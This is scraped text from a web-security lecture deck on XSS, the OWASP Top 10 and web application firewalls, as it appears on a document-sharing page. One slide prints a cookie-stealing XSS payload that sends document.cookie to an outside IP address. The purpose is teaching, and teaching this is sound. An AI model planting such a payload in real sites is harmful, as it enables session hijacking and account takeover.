to get the file

More documents

Recommendations

Info

XSS – XSS illustrated 1. Attacker sets the trap – post the JavaScript code Application with stored XSS code Attacker 2. Victim views page – sees attacker‟s posting Script runs inside victim‟s browser with full access to the DOM and cookies Accounts Finance Administration Transactions Custom Code Communication Knowledge Mgmt E-Commerce Bus. Functions victim 3. usually, the script are designed to send victim‟s session or cookie to hacker silently. With victim‟s session ID or cookie, hacker can login to the web site without an victim‟s ID and password. image source: www.owasp.org 24
More XSS example • url="http://143.248.3.1/GetCookie.aspcookie="+docume nt.cookie;window.open(url,width=0, height=0); 25
Page 1 and 2: Chapter 7. Web Application Firewall
Page 3 and 4: Remind - term project Selected data
Page 5 and 6: Agenda • I. Notice for term proje
Page 7 and 8: Web application (2/2) ▣ web appli
Page 9 and 10: Why is web security important Netwo
Page 11 and 12: Is it easy to hack into web GET / H
Page 13 and 14: Basic web hacking technique • Dir
Page 15 and 16: OWASP top 10 • OWASP top 10 proje
Page 17 and 18: What‟s new in OWASP Top 10 (2010)
Page 19 and 20: OWASP Top 10 (2010) 19
Page 21 and 22: More SQL injection examples Query =
Page 23: Injection - how to defend 1. Use a
Page 27 and 28: XSS - how to defend 1.Filter all un
Page 29 and 30: 2. Broken Access Control • Access
Page 31 and 32: 3. Broken Account and Session Manag
Page 33 and 34: 5. Buffer Overflows • Web applica
Page 35 and 36: 7. Error Handling Problems • Erro
Page 37: 8. Insecure Use of Cryptography •
Page 40 and 41: 10. Web and Application Server Misc
Page 42 and 43: Web Application Firewall • Why do
Page 44 and 45: WAF Protection models • WAF‟s m
Page 46 and 47: WAF - negative filtering model •
Page 48 and 49: WAF - Output Detection Model/Conten
Page 50 and 51: VA+WAF • Some commercial WAF prod
Page 52 and 53: Commercial WAF • art of defence -
Page 54 and 55: Agenda • I. Notice for term proje
Page 56 and 57: More practical recommendations •
Page 58 and 59: More practical recommendations •
Page 60: References • http://www.owasp.org

to get the file

Create successful ePaper yourself

Delete template?

Save as template?